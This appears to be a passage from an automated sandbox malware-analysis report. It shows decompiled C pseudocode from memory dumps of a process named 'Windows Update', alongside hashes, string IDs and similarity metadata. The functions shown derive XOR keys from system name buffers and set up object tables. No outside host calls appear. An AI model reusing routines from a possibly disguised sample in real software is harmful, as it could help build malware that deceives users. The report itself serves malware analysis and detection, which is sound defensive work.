	signed int _t89;
	signed int _t92;
	signed int _t97;
	intOrPtr* _t102;
	signed short* _t103;
	intOrPtr _t106;
	void* _t107;

	_t85 = 0;
	_v20 = 0xa3;
	_v19 = 0x1e;
	_v18 = 0xf3;
                                                                                  				_v17 = 0x69;
                                                                                  				_v16 = 7;
                                                                                  				_v15 = 0x62;
                                                                                  				_v14 = 0xd9;
                                                                                  				_v13 = 0x1f;
                                                                                  				_v12 = 0x1e;
                                                                                  				_v11 = 0xe9;
                                                                                  				_v10 = 0x35;
                                                                                  				_v9 = 0x7d;
                                                                                  				_v8 = 0x4f;
                                                                                  				_v7 = 0xd2;
                                                                                  				_v6 = 0x7d;
                                                                                  				_v5 = 0x48;
                                                                                  				_v292 = 0;
                                                                                  				L00F503F4();
                                                                                  				_v548 = 0;
                                                                                  				L00F503F4();
                                                                                  				_v1572 = 0;
                                                                                  				L00F503F4();
                                                                                  				_v1060 = 0;
                                                                                  				L00F503F4();
                                                                                  				_v36 = _a4 + 4;
                                                                                  				_a4 = 0;
                                                                                  				_v24 = 0xff;
                                                                                  				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
                                                                                  				_v24 = 0xff;
                                                                                  				 *0x412018( &_v548,  &_v24);
                                                                                  				_t102 =  *0x4120d0;
                                                                                  				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                  				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                  				_t81 =  &_v292;
                                                                                  				_push(_t81);
                                                                                  				L00F503B6();
                                                                                  				_v32 = _t81;
                                                                                  				_t82 =  &_v548;
                                                                                  				_push(_t82);
                                                                                  				L00F503B6();
                                                                                  				_t106 = _v36;
                                                                                  				_v28 = _t82;
                                                                                  				_push(0x10);
                                                                                  				_push( &_v20);
                                                                                  				_push(_t106);
                                                                                  				L00F5043C();
                                                                                  				_t84 = 0xba0da71d;
                                                                                  				if(_v28 > 0) {
                                                                                  					_t103 =  &_v1060;
                                                                                  					do {
                                                                                  						_t97 = _a4 & 0x80000003;
                                                                                  						if(_t97 < 0) {
                                                                                  							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
                                                                                  						}
                                                                                  						_t89 = ( *_t103 & 0x0000ffff) * _t84;
                                                                                  						_t84 = _t84 * 0xbc8f;
                                                                                  						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
                                                                                  						_a4 = _a4 + 1;
                                                                                  						_t103 =  &(_t103[1]);
                                                                                  					} while (_a4 < _v28);
                                                                                  				}
                                                                                  				if(_v32 > _t85) {
                                                                                  					do {
                                                                                  						_t92 = _a4 & 0x80000003;
                                                                                  						if(_t92 < 0) {
                                                                                  							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
                                                                                  						}
                                                                                  						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
                                                                                  						_t84 = _t84 * 0xbc8f;
                                                                                  						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
                                                                                  						_a4 = _a4 + 1;
                                                                                  						_t85 = _t85 + 1;
                                                                                  					} while (_t85 < _v32);
                                                                                  				}
                                                                                  				return _t84;
                                                                                  			}

Strings
Memory Dump Source
• Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
Yara matches
Similarity
• API ID:
• String ID: 5$H$O$b$i$}$}
• API String ID: 0-3760989150
• Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
• Instruction ID: b60148f7cd5ea1501988367bdcf00cb2c64412daab4e22d48f817e87b06c76bc
• Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
• Instruction Fuzzy Hash: 2851D97180025DAEDF11CBA4CC40AEEBBBCEF49314F0441A9EA55E6191D7789B84CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
			E00F41642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L00F503F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E00F41819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E00F4104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L00F503FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E00F41819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E00F41819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E00F41819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E00F41819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E00F4D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E00F412DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L00F503FA();
						_t65 = E00F41279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}
                                                                                  0x00f41806
                                                                                  0x00f41816

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                  • API String ID: 0-2857912252
                                                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction ID: 80830ee7ed8811d1de502ca65db655b684a18a5700d29dc67b2bc2f4ec5ea078
                                                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction Fuzzy Hash: CD514AB190025D9BDF24DF60CD45ADD3BB8FF04308F10812AFD28A6151D7B99AA9DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 88%
                                                                                  			E00F09829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				signed int _v20;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t66;
                                                                                  				void* _t70;
                                                                                  				intOrPtr _t71;
                                                                                  				signed int _t74;
                                                                                  				signed int _t84;
                                                                                  				void* _t85;
                                                                                  				signed int _t94;
                                                                                  				signed int* _t95;
                                                                                  				signed int _t96;
                                                                                  				signed int* _t97;
                                                                                  				signed char* _t100;
                                                                                  				signed int _t101;
                                                                                  				signed char _t104;
                                                                                  				signed char* _t136;
                                                                                  				intOrPtr _t140;
                                                                                  
                                                                                  				_t136 = _a8;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v12 = 1;
                                                                                  				_v16 = 0x4435dc;
                                                                                  				if(_t136 != 0) {
                                                                                  					_t101 =  *_t136 & 0x000000ff;
                                                                                  					if(_t101 == 0x84) {
                                                                                  						_t101 = _t136[0x23] & 0x000000ff;
                                                                                  					}
                                                                                  					if(_t101 != 0x9c) {
                                                                                  						L8:
                                                                                  						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
                                                                                  							_t140 = _a4;
                                                                                  							_t66 = E00F0980E(_t140);
                                                                                  							_v8 = _t66;
                                                                                  							if(_t66 == 0) {
                                                                                  								goto L22;
                                                                                  							}
                                                                                  							if((_t136[2] & 0x00000400) == 0) {
                                                                                  								_push(_t136[4]);
                                                                                  								_t71 = E00EFCE3A(0x44a3c8, _v16);
                                                                                  								_v20 = _t71;
                                                                                  								if(_t71 != 0) {
                                                                                  									_t129 = _v8;
                                                                                  									if(_v8 != 0) {
                                                                                  										E00F093C1(0x41315e, _t129, _t71, 1);
                                                                                  									}
                                                                                  									if(_t101 == 0x82) {
                                                                                  										 *((char*)(_v8 + 0x1e)) = 2;
                                                                                  									}
                                                                                  									L27:
                                                                                  									if(_t101 == 0x81 || _t101 == 0x82) {
                                                                                  										if(_a16 != 0x62) {
                                                                                  											goto L31;
                                                                                  										}
                                                                                  										_push(0x63);
                                                                                  										goto L32;
                                                                                  									} else {
                                                                                  										L31:
                                                                                  										_push(_a16);
                                                                                  										L32:
                                                                                  										E00F0BE00(_v8);
                                                                                  										_t74 = _v8;
                                                                                  										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
                                                                                  											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L22;
                                                                                  							}
                                                                                  							E00F09280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
                                                                                  							goto L27;
                                                                                  						} else {
                                                                                  							if(_t101 != 0x9c) {
                                                                                  								if(_t101 != 0x83) {
                                                                                  									L36:
                                                                                  									 *_a20 = _v8;
                                                                                  									goto L37;
                                                                                  								}
                                                                                  								_t140 = _a4;
                                                                                  								_t84 = E00F0980E(_t140);
                                                                                  								_v8 = _t84;
                                                                                  								if(_t84 == 0) {
                                                                                  									L22:
                                                                                  									 *((char*)(_t140 + 0x1e)) = 1;
                                                                                  									E00EFC16B(_t140, _v20);
                                                                                  									E00F09A4C(_v8);
                                                                                  									 *_a20 =  *_a20 & 0x00000000;
                                                                                  									_t70 = 7;
                                                                                  									return _t70;
                                                                                  								}
                                                                                  								_t85 = E00EFD157(_t136[4] + 2);
                                                                                  								asm("cdq");
                                                                                  								E00F093C1(0x41315e, _v8, E00EFD801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
                                                                                  								L17:
                                                                                  								L34:
                                                                                  								_t108 = _v8;
                                                                                  								if(_v8 != 0) {
                                                                                  									E00F0BCAB(_t108);
                                                                                  								}
                                                                                  								goto L36;
                                                                                  							}
                                                                                  							L12:
                                                                                  							if(E00F09829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							E00F091BB(_v8);
                                                                                  							_t94 = _v8;
                                                                                  							_t95 = _t94 + 0x10;
                                                                                  							asm("adc edx, 0x0");
                                                                                  							 *_t95 =  ~( *_t95);
                                                                                  							_t95[1] =  ~( *(_t94 + 0x14));
                                                                                  							_t96 = _v8;
                                                                                  							_t97 = _t96 + 8;
                                                                                  							asm("adc edx, 0x0");
                                                                                  							 *_t97 =  ~( *_t97);
                                                                                  							_t97[1] =  ~( *(_t96 + 0xc));
                                                                                  							E00F0BE00(_v8, _a16);
                                                                                  							goto L17;
                                                                                  						}
                                                                                  					}
                                                                                  					_t100 = _t136[8];
                                                                                  					_t104 =  *_t100;
                                                                                  					if(_t104 == 0x81 || _t104 == 0x82) {
                                                                                  						_v12 = _v12 | 0xffffffff;
                                                                                  						_t136 = _t100;
                                                                                  						_t101 =  *_t136 & 0x000000ff;
                                                                                  						_v16 = 0x44a3c4;
                                                                                  						goto L8;
                                                                                  					} else {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  				} else {
                                                                                  					 *_a20 = 0;
                                                                                  					L37:
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}
                                                                                  0x00f09834
                                                                                  0x00f09839
                                                                                  0x00f0983c
                                                                                  0x00f0983f
                                                                                  0x00f09846
                                                                                  0x00f0984d
                                                                                  0x00f09859
                                                                                  0x00f09862
                                                                                  0x00f09864
                                                                                  0x00f09864
                                                                                  0x00f0986f
                                                                                  0x00f09890
                                                                                  0x00f09893
                                                                                  0x00f0996d
                                                                                  0x00f09970
                                                                                  0x00f09977
                                                                                  0x00f0997a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f09982
                                                                                  0x00f09998
                                                                                  0x00f099a3
                                                                                  0x00f099ad
                                                                                  0x00f099b0
                                                                                  0x00f099d4
                                                                                  0x00f099d9
                                                                                  0x00f099e6
                                                                                  0x00f099ec
                                                                                  0x00f099f3
                                                                                  0x00f099f8
                                                                                  0x00f099f8
                                                                                  0x00f099fc
                                                                                  0x00f09a02
                                                                                  0x00f09a10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f09a12
                                                                                  0x00000000
                                                                                  0x00f09a16
                                                                                  0x00f09a16
                                                                                  0x00f09a16
                                                                                  0x00f09a19
                                                                                  0x00f09a1c
                                                                                  0x00f09a21
                                                                                  0x00f09a29
                                                                                  0x00f09a2b
                                                                                  0x00f09a2b
                                                                                  0x00000000
                                                                                  0x00f09a29
                                                                                  0x00f09a02
                                                                                  0x00000000
                                                                                  0x00f099b0
                                                                                  0x00f0998f
                                                                                  0x00000000
                                                                                  0x00f098b1
                                                                                  0x00f098b3
                                                                                  0x00f0991e
                                                                                  0x00f09a3d
                                                                                  0x00f09a43
                                                                                  0x00000000
                                                                                  0x00f09a43
                                                                                  0x00f09924
                                                                                  0x00f09927
                                                                                  0x00f0992e
                                                                                  0x00f09931
                                                                                  0x00f099b2
                                                                                  0x00f099b5
                                                                                  0x00f099ba
                                                                                  0x00f099c4
                                                                                  0x00f099cc
                                                                                  0x00f099d1
                                                                                  0x00000000
                                                                                  0x00f099d1
                                                                                  0x00f0993a
                                                                                  0x00f09944
                                                                                  0x00f09961
                                                                                  0x00f09967
                                                                                  0x00f09a31
                                                                                  0x00f09a31
                                                                                  0x00f09a36
                                                                                  0x00f09a38
                                                                                  0x00f09a38
                                                                                  0x00000000
                                                                                  0x00f09a36
                                                                                  0x00f098b5
                                                                                  0x00f098cf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f098d8
                                                                                  0x00f098dd
                                                                                  0x00f098e3
                                                                                  0x00f098ed
                                                                                  0x00f098f0
                                                                                  0x00f098f4
                                                                                  0x00f098f7
                                                                                  0x00f098fd
                                                                                  0x00f09904
                                                                                  0x00f09909
                                                                                  0x00f0990b
                                                                                  0x00f09911
                                                                                  0x00000000
                                                                                  0x00f09911
                                                                                  0x00f09893
                                                                                  0x00f09871
                                                                                  0x00f09874
                                                                                  0x00f09879
                                                                                  0x00f09880
                                                                                  0x00f09884
                                                                                  0x00f09886
                                                                                  0x00f09889
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f0984f
                                                                                  0x00f09852
                                                                                  0x00f09a45
                                                                                  0x00000000
                                                                                  0x00f09a45

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ^$^1A$^1A$b$mbe.
                                                                                  • API String ID: 0-3662265252
                                                                                  • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction ID: 7789cc11dfbef057b4e45b0fedf8be83ca64653e7c5a5f9728c6f879e0e33681
                                                                                  • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction Fuzzy Hash: 4461AF31E08209EFDB14CF68C9817AD7BB1EF45320F248159E815AB2D3E7B99E50BB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
E00F42E88(intOrPtr* __edi, void* __eflags) {
	void* __esi;
	intOrPtr* _t49;
	intOrPtr* _t50;
	intOrPtr* _t51;
	intOrPtr* _t53;
	intOrPtr* _t54;
	intOrPtr* _t59;

	_t60 = __edi;
	E00F47340(__edi, __eflags);
	 *((intOrPtr*)(__edi + 0x1d8)) = 0;
	 *((intOrPtr*)(__edi + 0x1cc)) = 0;
	 *((intOrPtr*)(__edi + 0x1d0)) = 0;
	 *((intOrPtr*)(__edi + 0x1d4)) = 0;
	_t5 = _t60 + 0x1e0; // 0x1e0
	_t49 = _t5;
	 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
	 *_t49 = 0x413754;
	 *((intOrPtr*)(_t49 + 0x10)) = 0;
	 *((intOrPtr*)(_t49 + 4)) = 0;
	 *((intOrPtr*)(_t49 + 8)) = 0;
	 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
	 *((intOrPtr*)(_t49 + 0xc)) = 0;
	 *_t49 = 0x413760;
	 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
	_t13 = _t60 + 0x1f8; // 0x1f8
	_t50 = _t13;
	 *((intOrPtr*)(_t50 + 4)) = 0;
	 *((intOrPtr*)(_t50 + 8)) = 0;
	 *((intOrPtr*)(_t50 + 0xc)) = 0;
	 *((intOrPtr*)(_t50 + 0x10)) = 0;
	 *((intOrPtr*)(_t50 + 0x14)) = 0;
	 *((intOrPtr*)(_t50 + 0x18)) = 0;
	 *((intOrPtr*)(_t50 + 0x1c)) = 0;
	 *_t50 = 0;
	_t21 = _t60 + 0x630; // 0x630
	_t51 = _t21;
	 *((intOrPtr*)(_t51 + 8)) = 0x20;
	 *_t51 = 0;
	 *((intOrPtr*)(_t51 + 0xc)) = 0;
	 *((intOrPtr*)(_t51 + 4)) = 0;
	 *((char*)(__edi + 0x52a)) = 0;
	_t26 = _t60 + 0x64c; // 0x64c
	 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
	E00F43549(_t26);
	 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
	 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
	_t30 = _t60 + 0x870; // 0x870
	_t53 = _t30;
	 *_t53 = 0x4130f0;
	_t31 = _t60 + 0x878; // 0x878
	_t59 = _t31;
	 *_t59 = 0x413144;
	 *_t53 = 0x412f34;
	_t32 = _t60 + 0x87c; // 0x87c
	_t54 = _t32;
	 *__edi = 0x412e98;
	 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
	 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
	 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
	 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
	 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
	 *_t59 = 0x412f38;
	_t38 = _t60 + 0x890; // 0x890
	 *_t54 = 0x413bd8;
	 *((intOrPtr*)(_t54 + 8)) = 0;
	 *((intOrPtr*)(_t54 + 0x10)) = 0;
	 *((intOrPtr*)(_t54 + 4)) = 0;
	 *((intOrPtr*)(_t54 + 0xc)) = 0;
	E00F43549(_t38);
	 *((char*)(__edi + 0xb20)) = 0;
	 *((char*)(__edi + 0xc25)) = 0;
	 *((char*)(__edi + 0xd2a)) = 0;
	 *((char*)(__edi + 0xe2f)) = 0;
	 *((char*)(__edi + 0xa9c)) = 0;
	return __edi;
}

Instruction addresses: 0x00f42e88 0x00f42e8c 0x00f42e93 0x00f42e99 0x00f42e9f 0x00f42ea5 0x00f42eab 0x00f42eab 0x00f42eb6 0x00f42ebc 0x00f42ec2 0x00f42ec5 0x00f42ec8 0x00f42ecb 0x00f42ece 0x00f42ed1 0x00f42ed7 0x00f42ee1 0x00f42ee1 0x00f42ee7 0x00f42eea 0x00f42eed 0x00f42ef0 0x00f42ef3 0x00f42ef6 0x00f42ef9 0x00f42efc 0x00f42efe 0x00f42efe 0x00f42f04 0x00f42f0b 0x00f42f0d 0x00f42f10 0x00f42f13 0x00f42f19 0x00f42f1f 0x00f42f29 0x00f42f2e 0x00f42f38 0x00f42f42 0x00f42f42 0x00f42f48 0x00f42f4e 0x00f42f4e 0x00f42f54 0x00f42f5a 0x00f42f60 0x00f42f60 0x00f42f66 0x00f42f6c 0x00f42f76 0x00f42f80 0x00f42f8a 0x00f42f94 0x00f42f9e 0x00f42fa4 0x00f42faa 0x00f42fb0 0x00f42fb3 0x00f42fb6 0x00f42fb9 0x00f42fbc 0x00f42fc1 0x00f42fc7 0x00f42fcd 0x00f42fd3 0x00f42fda 0x00f42fe3

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                  • API String ID: 0-851144607
                                                                                  • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction ID: b537f7eedf66a03181d9ddf50c3a39e2dfa698e024ec1aadf31c7c219a496030
                                                                                  • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction Fuzzy Hash: 374172B0655642DFC3098F2AC5846C1FFE0BB09314F96C2AFC46C9B211C7B4A5A5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
E00F43021(intOrPtr* __esi) {
	void* __edi;
	intOrPtr* _t20;
	void* _t24;

	_t20 = __esi + 0x878;
	 *__esi = 0x412e98;
	 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
	 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
	 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
	 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
	 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
	 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
	 *_t20 = 0x412f38;
	E00F43663(__esi + 0x890);
	 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
	E00F4D71D(__esi + 0x87c);
	 *_t20 = 0x413144;
	 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
	E00F43663(__esi + 0x64c);
	E00F42FE4(__esi + 0x1c8, _t24);
	return E00F4744A(__esi);
}

Instruction addresses: 0x00f43029 0x00f43035 0x00f4303b 0x00f43041 0x00f4304b 0x00f43055 0x00f4305f 0x00f43069 0x00f43073 0x00f43079 0x00f43084 0x00f4308a 0x00f4308f 0x00f4309b 0x00f430a5 0x00f430aa 0x00f430b8

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                  • API String ID: 0-2435369464
                                                                                  • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction ID: 3979d8145bb145502e1339f60808532e2869f95b793ef3ac01d4bf89521ac6b8
                                                                                  • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction Fuzzy Hash: 20011DB4000B45CAC721EF24C540ACABBF4FB40305F50C90FE4EA4B204DBB8A19ADF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  • land), xrefs: 00EF8A3E
                                                                                  • 26316EE3FB0D};0804:00000804;0804:{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}{F3BA9077-6C7E-11D4-97FA-0080C882687E};0804:{E429B25A-E5D3-, xrefs: 00EF883E
                                                                                  • def., xrefs: 00EF87D7
                                                                                  • Svizra), xrefs: 00EF87B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 26316EE3FB0D};0804:00000804;0804:{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}{F3BA9077-6C7E-11D4-97FA-0080C882687E};0804:{E429B25A-E5D3-$Svizra)$def.$land)
                                                                                  • API String ID: 0-4033462617
                                                                                  • Opcode ID: 209f6f8739e3a90a3b5928d3f380b2d6c3a88b52f49b74250df187426c8b3a31
                                                                                  • Instruction ID: 782314d702d5237b6228bd3ba65d040cc89f2f6dea380953e838c541c9eabb4f
                                                                                  • Opcode Fuzzy Hash: 209f6f8739e3a90a3b5928d3f380b2d6c3a88b52f49b74250df187426c8b3a31
                                                                                  • Instruction Fuzzy Hash: BD7190B680021DBEDF11AF60EC45EEA3B6CFF08355F0450B6FA08A6061DB759E849F64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%